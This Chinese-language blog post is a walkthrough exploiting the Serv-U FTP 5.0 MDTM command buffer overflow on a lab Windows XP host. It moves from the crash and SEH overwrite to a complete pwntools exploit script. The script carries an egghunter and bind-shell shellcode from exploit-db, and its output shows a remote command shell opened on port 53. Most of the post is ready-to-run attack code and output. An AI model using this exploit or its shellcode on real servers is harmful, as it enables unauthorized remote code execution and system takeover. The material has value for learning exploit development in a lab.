ღ Miranda

Serv-U FTPd Server 5.0 MDTM Command Buffer Overflow

Serv-U 5.0版本的MDTM命令缓冲区溢出漏洞利用。

漏洞验证

系统为windows xp sp3,假设ftp服务器地址为192.168.134.128,用户名密码都为test,尝试在MDTM命令的时间参数输入超长的变量:

$ ftp 192.168.134.128
Connected to 192.168.134.128.
220 Serv-U FTP Server v5.0 for WinSock ready...
Name (192.168.134.128:seviezhou): test
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote MDTM 19811102172800+11_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBB test.txt
421 Service not available, remote server has closed connection.

发现服务已经崩溃,然后用immunity debugger附加ServUDaemon调试,再次发送发现:

00683AC2   F3:A5  REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

在这句时ESI=41414142,引发了异常,查看SEHchian发现:

SEH chain of thread 00000560, item 0
 Address=00EFD1BC
 SE handler=41414141

异常处理函数地址被覆盖,所以我们间接控制了EIP,通过异常转到异常处理函数。

漏洞利用

通过定位发现payload布局为:

"MDTM 19811102172800+11_" + "A"*44 + nextseh + sehhandler + others

在xp下需要把sehhandler覆盖为pop pop ret的地址,用mona插件我们可以找到很多地址,我随便选择了0x10060f97这个地址,nextseh里填上跳转指令调到后面的shellcode,这里有一个问题就是这里的缓冲区有长度限制,放不下shellcode,这里需要使用egghunt技术,由于文件名长度没有限制,可以放得下shellcode,所以可以在others里存放egghunt代码,把shellcode放在文件名参数中。

这里我一开始使用弹出计算器的shellcode,始终弹不出来,最后用procexp.exe监视进程,发现其实在ServUDaemon下确实创建了calc.exe子进程,服务关闭后仍然存在calc.exe进程,但不显示,所以我使用了exploit-db上的shellcode,开启服务器的53端口等待连接。

脚本如下:

from pwn import *
from os import system

#context.log_level = 'DEBUG'

search = ""
search += "\x5E\x5F\x5B\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F"
search += "\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF"
search += "\xD3"
buf = ""
buf += "lion" # shellode flag
buf += "\x70\xBB\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
buf += "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x5B\x99\x99\x99"
buf += "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
buf += "\x71\xF3\x9E\xC0\x71\x30\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
buf += "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
buf += "\xF3\x9B\x66\xCF\x8D\x12\x41\x5E\x9E\x98\x99\x99\x99\xF3\x9D\x14"
buf += "\x8E\xCB\xF3\x9D\xF1\x66\x66\x99\x99\xCA\x66\xCF\x81\x5E\x9E\x9B"
buf += "\x99\x99\xAC\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCF\x85\xF3\x98\xCA"
buf += "\x66\xCF\xB9\xC9\xC9\xCA\x66\xCF\xBD\x12\x41\xAA\x59\xF1\xFA\xF4"
buf += "\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x8D\xC0\x10\x9D\x16"
buf += "\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10\xC6\xD1\x10"
buf += "\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8\xC8\xF3\x98"
buf += "\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66"
buf += "\xCF\x91\x72\x9E\x09\x09\x09\x09\x09\x09\x09\xCA\x66\xCF\xB1\x66"
buf += "\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF"
buf += "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
buf += "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC7"
buf += "\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44\x12\x9D"
buf += "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x40\x67\x66\x66\x17\xD7\x97\x75"
buf += "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2"
buf += "\x40\x90\x6C\x34\x75\x6B\xCC\x59\x3D\x83\xE9\x5E\x3D\x34\xB7\x70"
buf += "\x7C\xD0\x1F\xD0\x7E\xE0\x5F\xE0"
buf += "li0n"

ppr = 0x10060f97 # pop esi # pop ecx # ret

p = remote('192.168.134.128', 21)

p.recvline()
p.send('USER test\r\n')
p.recvline()
p.send('PASS test\r\n')
p.recvline()

payload = "MDTM 19811102172800+11_"
payload += "A" * 44
payload += "\x90\x90\xEB\x04" # nop nop jmp 4
payload += p32(ppr)
payload += search
payload += " "
payload += buf
payload += "\r\n"

p.send(payload)

log.success("Connecting to shell...")
system("telnet 192.168.134.128 53")

运行:

$ python servu.py
[+] Opening connection to 192.168.134.128 on port 21: Done
[+] Connecting to shell...
Trying 192.168.134.128...
Connected to 192.168.134.128.
Escape character is '^]'.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

C:\>exit
exit
Connection closed by foreign host.
[*] Closed connection to 192.168.134.128 port 21

发表评论

电子邮件地址不会被公开。